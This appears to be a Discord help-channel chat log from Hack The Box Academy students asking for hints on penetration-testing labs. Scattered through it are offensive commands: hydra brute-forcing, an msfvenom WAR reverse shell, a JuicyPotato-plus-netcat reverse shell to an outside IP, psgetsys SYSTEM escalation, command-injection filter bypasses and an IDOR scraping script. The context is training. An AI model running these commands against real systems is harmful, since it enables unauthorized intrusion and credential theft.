Copy Us1nG and everything after it

ok

Didn't work, Can i DM you?

I fixed it. @fathom pendant Thank you

hydra has tried more than 5134 tries in 47 minutes

so far

how much longer should I give it?

more than 88000 more to go it says

is this just a tedious thing to learn to deal with?

I mean I went and took a 40 minute sits bath and its still going

same module, why would I get a 200 OK message on the transfer, but then have it say i dont have permission to write in LinEnum (when im not even writing in it, just trying to transfer it over?)

Write error because you don't have permission to write files in the directory you're in

200 is just a status code stating the file was retrieved, nothing to do with anything after retrieval -- like writing a file

fixed it

When you download or copy a file you're essentially writing a new file as your current user

i did the chmod +x on my vm before starting the http.server

That generally shouldn't have anything to do with it

I stopped attacking ssh with hydra and started attacking ftp with hydra because attacking smb with it wasn't working

here's the error it gives me:

[ERROR] Not an FTP protocol or service shutdown: 421 There are too many connections from your internet address.

Ssh is a painfully slow service

Means too many threads

ok

ok

I'd suggest restarting the target

ok restarting target

we'll see if attacking ftp works

Hey Guys im struggling in module "Injection Attacks" section "XPath - Advanced Data Exfiltration" i tried with 2nd positon to make its value 2 as the example in the module but didnt find then tried 3 but didnt find flag too , am i doing something wrong ?

Look further

i used burp intruder but nthing

or you meant further in depth?

Further in depth

I ran ./LinEnum.sh, where in the output am I supposed to see what file I can write to without root access?

because there is TONS of output and i have no idea where i'm supposed to be looking

I tried
./LinEnum.sh | grep .sh
to look for just .sh files, but that didn't work

I did the echo writing to the .bash_history file, thinking that's what I had to try to execute (i have no idea how, it's the only thing that looked somewhat right) but that hasn't led to any success

whoami, and ls -la will become second nature to your fingers. Also /tmp.

If you're struggling with these things I highly suggest you take a good hard look at the Linux fundamentals module.

Thank you! yeah, i tried ls -alh, but i couldn't find any .sh files. ls -la didn't show any either, unfortunately

Hey guys, I need a hint on the Skills Assessment section of the CrackMapExec module. I've got my first credentials, and then used that to gain a second credential. The second credential has access to an addition RO share, but I couldn't find anything useful in that. I can escalate both users to administrator in SQL but can't execute shell commands or access any of the non-standard dbs.

Haven't done the module yet, but use cme to get a list of users and descriptions?

Assuming AD

hi guys I got the flag

I have a list of users but I can only get 3 descriptions.

I must aks, the footprinting lab Medium. I have enumerated the info I can find, || got creds so that I can log in as administrator, but dont fully understand the question || find the password for username HTB. || I'm going through the database but cannot find any user named HTB. I check on the server, but cannot find such user. since I can connect remotely as admin, I guess I just would need a pointer in the right direction to make me understand what to look for. || thank you!

Did you read the hint? I'm stretching to remember but I think it was obvious once I'd read that.

That should go into #1234357888114364508

nvm im dumb

I was running it from pwnbox instead of target box

That'll do it.

Going though || the SQL server logs, but not sure if it´s supposed to be there.. ||

I can't remember and wasn't taking notes. I have memories of finding it in the app after that hint but can't remember where.

ok thanks, will keep looking 👍

Hi, I need some help on Attacking Common Services - Easy. I've been trying to enumerate the SMTP username, I have also increase the timeout time to 25 seconds still nothing username appear. Here are my commands ||smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t <target-ip> -w 30||

double check if you are connected to the vpn

vpn is connected, I can ping and nmap the target with no issue

I will try reset the target and vpn

@shut vapor @quiet trout thank you for the response guys

@fathom pendant how far are u with AEN?

can anyone help me out on the windows lateral movement module?

Hey anyone knw where to look for the flag once inside tomcat in attacking tomcat module

Use the find or locate command

It’s also in the most common place where flags are

anyone else had this issue with LaZagne in the windows priv esc module ?

i managed to ||decrypt the password manually with python, but weird in the solution it shows lazagne automatically decrypting it ||

Just a question out of curiosity:
Footprinting - Easy Lab.
(I have completed the lab)

||When connecting to the FTP server and performing ls it doesn't list the directory and states:||
||Entering Extended Passive Mode ||
||Opening ASCII mode data connection for file list||

||I used mlsd to transfer the id_rsa but is there a way to make ls start working? I tried running passive and binary but to no avail.||

Cant find it anywhere

the flag has a weird name, like flag_234k2h42i3u4.txt
Try find / -iname flag* 2> /dev/null

I cant seem to find it to cat it anywhere

Found it thanks

Hey guys, for Shells & Payloads Live Engagement;

Can't some to get reverse shell, things I done so far:

LHOST=GeneratedTargetIP LPORT=7777 -f war -o shell.war``` 

on msfconsole using multi/handler, I set the LHOST and LPORT to the same as the shell file

when uploeading on the manager page (WAR file to delpoy) should get a connection but I don't.

Did I miss anything?

LHOST is the IP address from the tun0 interface and not the target machine's IP address

is that bc the target ip address thats given is just to connect to the foothold machine, but the machine itself has a different ip to connect too?

well, then use the jump host's IP address that allows the communication to the service you will be abusing

which likely will be internal

Hello i need help about Active Directory Enumeration & Attacks - Internal Password Spraying - from Linux, i now how to spray password with kerbrute but when i try this command "./kerbrute_linux_amd64 passwordspray -d attack01.local --dc 10.129.187.240 jsmith.txt Welcome1" it says there is no kdc. I enum the host with nmap but there is no 88 and smb protocol working just 3269 and ssh. How to pass this section PLEASE HELP

i manually added the domain name /etc/hosts because there is no domain name on host.

connect to the target host with the given credentials

yea i did that

but what is the domain name ?

The same used across the sections/module

There are multiple ways to get the domain name

i use domainname command and returns (none)

can you show me how to do this section, i'm sure my command is absolutely true

hostname is ea-attack01
domainname is none i stuck

focus on the domain and the dc ip

if you fix them you will get the answer for the question

Ask yourself if the 10.129.x.x IP is actually the domain controller or not

okay i will nmap for the ip like this 10.129.x.0/24, I hope gives me the domain controller IP

this will not help you

authenticate to the target machine and then use nmap to find the domain controller

i authanticate and run the nmap on the target machine then i found 10.129.x.177 but there is no domain name anyway...

still stuck

Attacking Authentication Mechanisms Skills Assessment PLEASE, WHAT'S WITH THIS ASSESSMENT

Still need help

hey yall, im doing the Pentester module, but got stuck on the SMPT enumeration, the question is:
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I've been at it for the last 6 hours still cant find the username, tried everything including msfconsole and the previous lections as well as the web, can I get some help

What exactly do you want to know?
What you need for the solution was previously discussed in the module.

I'm not sure if this is that lesson, but remember that sometimes a mail server takes longer to respond. Maybe you need to adjust the waiting time a bit

If you ssh in 10.129.x.x maybe inside of there there's other IPs? 🙂

Hint: there's tools available once you ssh into the 10.129.x.x for a reason

Just did that section yesterday and can say your close

i'm having trouble on "injection attacks" section skill assessment, can someone give me a nudge.

sure DM

yes i finally got it !!!! thx

hello guys i stuck on windows privesc with the SeDebugprivilege i download the new script of POC and did the cmd as in example but i does'nt work
https://academy.hackthebox.com/module/67/section/631

Hey i need a help in proxyconfiguration

i am using SOCKS proxy and here i setup it also setup proxy config file

Did you have create a fowarding port with ssh on port 9090 ?? And try with socks4

ya ```bash
ssh -D 9090 ubuntu@10.129.29.80

but not try with socks4

i am not understand why its not working here

tried with sudo

i run with proxychains without 4

not working bro

did you tried -p- option ? with thread or port udp or -sS option ... and the conf file of proxychains Is this the file you're modifying? /etc/proxychains.conf

Guys I need help with skill assessment of the pivoting module, I cannot rdp to .6.25, with vfrank user I don't know what I am doing wrong I checked the proxy and everything works well

Please let me know if I forgot something!!

is academy payment system having an issue ?

Anyone for a nudge on the Advanced SQL Injection Skills Assessment.
I made a script to give me a filtered end payload which should work upon source code logic but even with a basic tautology I can't seem to get it to return true.

Anyone done HTTP Response splitting i can dm?

stuck on final part

in module HTTP attacks

I'm doing the web enumeration module, and even when I copy and paste the solution from HTB. I get wildly different responses

Plz don't forget me

Is RDP open?

for Windows Server - Dealing with EOL systems - Window privilege escalation, does the smb_payload from metasploit not work? i tried a couple of times but cant get a connection from the machine to metasploit

anyone ?

Use the "dns_exf" index and the "bro:dns:json" sourcetype. Enter the attacker-controlled domain as your answer. Answer format: _.*

Have you finished this? I have used certain commands, but I am having trouble finding a domain that matches the format (2 words. Ex: my.domain)*

Thankyou!

try the other method?

with procdump and mimikatz

need some help w xss skill assessment. i got the part on GET /myscript.js, followed by closing but nvr get any flag

I succeeded with mimikatz but why does it use the psgetsys script knowing that it doesn't work and it's still taught in the course.

I'm sorry but this makes no sence to me. I have read up on || SQL Server Management Studio, I know I'm supposed to be able to see the last xx entries, etc. I've checked all relevant columns I can think of, but it's like looking for a needle in a haystack. I've read the hint, which doesn't help me anything since I am clicking around like crazy. || I do not just want to finally find the user, but rather understand WHY if was hidden just there, get some logic around it. Anyone? DM is fine if you don't want to spoil for others. I'm not after the exam, just going through the corse to learn.

Someone finished sliver c2 module?I need help! Thank you all

Hello guys, anyone did task 1 from intro to assembly language module? I think my flag is right but doesnt seem to work ; (

ls -la

Hidden files

Have you tried right-clicking?

Look for internal networks

I would review Port Forwarding with Windows Netsh section.

Finished it

hey marcie how are you ?

Hi, I am having some issues with HTTP Attacks - HTTP Response Splitting. I need a little push in the right direction, could someone please assist me with this one? DM please 🙂

I succeeded with mimikatz but not with what he proposes in the course https://academy.hackthebox.com/module/67/section/631

possible to dm you?

Sure

I don't recall what I did tbh

I think I just did the procdump tool

were you able to become a nt system with the psgetsys poc?

Didn't bother with getting system

hi

can i use HTB on chromebook

you can access the website on Chromebook

mhmm okay I'm curious to know if anyone has managed to make this poc work because they say to practice with the new version but it does not work it's been 4 hours I'm stuck on it

not sure about connecting to the VPN though. you can use Pwnbox instead

I mean it looks like you pass it a PID and a command to run

i can connect the openvpn from the virual linux machine

but its not connected to the browser of chromebook

Chromebook will be slightly limited

As they are on ARM architecture as well from what I recall

so i dont know in challanges that involve websites how to go through

You mean 10.129.x.x?

yes that's what I did I even put the name of the process winlogon.exe but nothing

... you put in the name of the command you want it to run

??? in the example, it is shown that we are doing this command : .\psgetsys.ps1; [Myprocess]::CreateProcessFromParent((Get-Process "winlogon").Id, "c:\windows\System32\cmd.exe", "") and it launches a shell for us

i tried lssas too

nothing

... read the actual how to use

There's a note in the module that states there was an update

https://github.com/decoder-it/psgetsystem

thx ..

I thought it was the code that had to be upgraded, not the order 😭

oh man am I dumb 🤦‍♂️ thanks marcie!

Sneaky hidden files

made me lose my mind for almost half an hour ngl

Yeah, they'll do that

super thx

need some help with Command Injections, Bypassing Other Blacklisted Characters. Trying to see what the user is in the /home directory. I've been trying to follow the module, but keep getting the successful ping and no other output

my command is ip=IP%(bypassing character)${HOME:0:5}${IFS}

Wide desktop

You need to run a command to ls

Second why are you splicing?

On your own linux machine run echo ${HOME:0:5}

/dynamic-resolution ahah

Also if you're www-data they might not have a home

The splicing is generally to get one character like ${PATH:0:1} will almost always give a /

Yeah... maybe I'm just blind but right clicking doesn't help me...

are you right-clicking the table?

:)

I got logged out during dinner will go in again and check.

Hey everyone, does someone else has the same problem as me: I use Virtual Box run a VM with Parrot OS, I launch the OpenVPN file on the VM and SSH into the htb-student. But when I get in, everything seems to be so slow and sluggish on the terminal, I type a command and it begins to type it 2 seconds later. Sorry if there's a already been a discussion about this in discord server. But seems like i haven't found it. Thx in advance!

change vpn region

And then download the UDP file again and change it?

Hello @lucid mountain Have you completed this challenge? If so, can you provide steps or SPL to solve this challenge?

I've tried that method, still the same.

tcp file

we don't share solutions here

we share nudges and pointers in the right direction

Yup, i just need nudges & pointers as you said. Can u help me?

Tried also. Should i just do it in the browser then?

Is there a benefit of doing it in your own created VM?

could be your network I've only ever had slowness issues like once ¯_(ツ)_/¯

Less risk

As you're gonna be constantly opening and closing ports for file transfers and other funny business

Don't want to compromise your host security

Got it guess I have to endure it then.

Guys im in pentester path, password attacks, module "passwd, shadow, passwd" , I found passwd.bak and shadow.bak, I did the command unshadow passwd.bak unshadow.bak > unshadowed.hash
Hashcat is taking so long, I don't even know if there's something wrong with the program or it's supposed to be going for so long

I think you need to you mutated password

🤔 but the module didn't do anything with mutated passwords

And hashcat keeps running, it's not that it can't find the password or something

Also John keeps running

It should work with the mutated password

It did in a previous section.

*section

Lol

Yeah I noticed it, lol.

Using the right wordlist helps

Why is xfreedrp not working for me

Why doesnt hashcat tell me no password match the hash?

Because if it's the word list it should try all of the passwords and tell me none match the hash

But it keeps not doing it

It will by saying exhausted.

Can I dm

Also if speed is an ongoing issue, you can always try cracking from you host instead of the VM.

Sure I have a couple of minutes.

would someone mind taking a look at my XXE attack request data from the Web Attacks module and tell me why its not working?

https://academy.hackthebox.com/module/134/section/1206

we're covering reverse shells for XXE RCE and the previous section, after covering a variety of other XXE paylaods, covered a very simple RCE in the information segment that i couldnt get to work (i assume not to make the target more vuln than needed)

but in this section part of the exercise requires an attack of this type and I am still unable to get it working, though i think my payload and request data is correct

basically i cant get the target to download my dtd

oh wait i might've messed up the scheme

nvm, i did mess up the scheme but it seems that its still not working -_-

Have you tried both methods?

i havent tried the error based yet, as im not there yet trying to get results as i encounter them, but the exercise says both ways work, so im a little miffed

I would try both first.

right, but i'll still end up with a non working payload that the lab says should work?

I've reverted the injection to be ip=(Injection Character)${IFS}{ls,-la}${HOME} and I get output for the previous question. I know I'm missing something, but can't place my finger on it

You won't know if the other doesn't work until you try it. If the other method doesn't work, feel free to DM and I will look at your setup.

Well home 0:5 gives you /home

thx, checking now

It's just understanding how the splicing works

Nice how was it?

Got it finally, thank you for your patience 🙂

Am I the only who has broken machine?

https://academy.hackthebox.com/module/134/section/1186

Im doing this model and I cant get successful output from CURL commands from this mode. Bash script also doesnt work for me

||```bash
#!/bin/bash

url="http://XX.XXX.XX.XX:XXXXX"

for i in {1..20}; do
for link in
$(curl -s "$url/documents.php?uid=$i" | grep -oP "/documents.*?.txt"); do
wget -q $url/$link
done
done

This is the script Im using.

Also, when I open "Documents" link, my URL doesnt containt "uid" parameter like its written out in module

Try curl -O instead of wget -q

Windows Privilege Escalation Skills Assessment - Part I
CMD C:\windows\system32\inetsrv> C:\Users\Public\juicypotato.exe -l 55678 -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\nc.exe 10.10.15.88 8443 -e cmd.exe" -t * -c {7A6D9C0A-1E7A-41B6-8284-C3F7A27BA381}
Testing {7A6D9C0A-1E7A-41B6-8284-C3F7A27BA381} 55678
COM -> recv failed with error: 10038
[+] calling 0x000000000088ce08

somebody knows what is wrong?

You could also try a different file using CDATA.

Doesnt work

neither did command:

||curl -s "http://SERVER_IP:PORT/documents.php?uid=1" | grep "<li class='pure-tree_link'>"||

I don’t think you can get reverse shells on some of them, just web

Hey i m planning to take macbook air m3 16gb 512 gb what say ?

It’s usually the ones that start with 80-90 and a random port number

hey i finally got it, both ways. it wasnt immediatley clear that the external dtd varaible needed to be appended below its definition in the XML source code... it was demonstrated but not defined why it was there... i thought that was the actual entity reference in the data structure not an additional reference required to load the data... dunno if im describing that right

Sorry I worded that poorly i was trying to get external dtd inclusion from a pwnbox hosted dtd file

The last command should work with curl -O

Did you check every file in ur directory

if you had errors in your source that you've fixed since launching your web server, be sure to close it and restart it... ive had issues like that. something to keep in mind.

it just dont. It downloads document.php page

No one for a nudge on the Advanced SQLI Skills Assessment?

what source?

something that also isnt discussed is whether DTD priority (or perhaps idempotency) exists...whether I can overwrite a DTD inline in XML source, or from another competing DTD? is that possible?

or even whether DTD's can co-exist.. an external DTD is loaded but my inline DTD has entities i create and try to custom use

I doubt it is broken.

Have you looked at an intercepted request?

yes

even there I cant see uid in URL or any request

see? there is no any uid in URL

Hello, I am working on the COMMAND Injection -> character shifting part

echo $(tr '!-}' '"-~'<<<[)

For this command, I don't understand why the output is a backslash, obviously the '[' character is not in the source character set, how can it be translated to a backslash?

can someone explain it to me, thanks

I would double check your burp request and response.

okay, there is. Checked it again and found it

but anyways, final bash script doesnt work

Is there something else you can do or use if that is not working?

As I understand it, all [modern?] OID's start with 1.3.6. It's like the Domain Name System where you read a domain name backwards to represent the hierarchy: www.example.com == . (root) - com (commercial) - example (domain) - www (host).

Coincidentally, I happen to be working now with SNMP today and I found this MIB (like a definition file for OID's) illustrating an NEC product's MIB starting with 1.3.6 and breaking down the elements.

So by querying 1.3.6.* you really dumped everything the system had to offer.

was that "hint question"? Because I dont know what to try else

Burp has tools that can help you quickly perform the testing necessary for this assessment. I did not use the provided script.

There’s like 10+ ways to get the flag

I used python

I literally went manually with http://IP:PORTdocuments.php?uid=XX from 1-20 @safe star @gray yacht

and it was giving me same page, without documents and .txt flag

Bro it’s a post request

the uid would be in the post data

Oh, actually I was wrong. I've never seen it, but there's are other assigning bodies other than ISO they can start with 0, 1 or 2.
https://www.alvestrand.no/objectid/top.html

wym?

can you explain further?

btw I used also this python script

Post requests don’t use ?

Suggest looking at the Verb Tampering section again.

import requests
import re
import os

url = "http://PORT:IP"

for i in range(1, 21):
    response = requests.get(f"{url}/documents.php?uid={i}")
    file_links = re.findall(r'\/documents.*?\.[a-zA-Z0-9]+', response.text)
    for link in file_links:
        file_url = f"{url}{link}"
        file_response = requests.get(file_url)
        file_name = os.path.basename(link)
        with open(file_name, 'wb') as file:
            file.write(file_response.content)

same sh*t, no result

Yeah, kinda weird how he did that but not this

Check your requests

k. changed to requests.post

still same. Nothing found

U will notice there is no uid in the url

Hello everyone! I'm stuck on Introduction to Windows Evasion Techniques SA1. I have two different but similar developed trojans, I scanned them with both the ThreadCheck tool and YARA with the crime_wannacry.yar and apt 17 rules, and a number of other rules that I found on the Internet for msf and microshell. My trojans are not detected, they were checked for virus total, there were 7 static ML triggers. If anyone has completed this and can advise what the problem is, please write to me in DM, I've been trying to solve this task for a week now

The url should look like the same just without “?uid=“

this has to do with ASCII or bitwise shifting i believe its called.

the <<< is telling the terminal to "back track"

thats whats happening

in the list of ascii chars

thing is, none of their commands from module works, not curl, not bash, not even this python script I sent

which is SO weird. Ill just skip module lol. Fk 2 cubes

Did you add the post data to the script using -d

@wintry iris do you remember earlier in the module where it described the table of ascii chars and their octal/hex/etc values?

yes

so I still don't get it

tr A-Z a-z <<< ABC, the output will be abc

but in the case above, the input char '[' in not in the source char set

God damn. I literally ran same scritp that I already did 5-6 times, with all post requests and it worked

and there isnt any word about using POST request, not GET. Their bash script doesntr working as well

I dont wanna rant, but 0/10 module tbh.

They’re not gonna give u an exact copy of the example

@wintry iris ok so i interpreted this incorrectly, when i recently did this module, but the implication is still the same (just dont want to confuse you its not bitwise shifting thats something similar, with a similar operator but not the same)

anyhow, in your ABC example, tr is translating a range of chars i think it evaluates ASCI A-Z as a range, and a-z as a range then uses heredoc to take in 'ABC' and "does the math" on the range, to output the answer... does that simplify it any?

true, but thats done in every module before this. Exact script/code that they give, it works

I feel like if u just used burp u would’ve found it in 1 minute

sure I understand how the TR command words and I often use it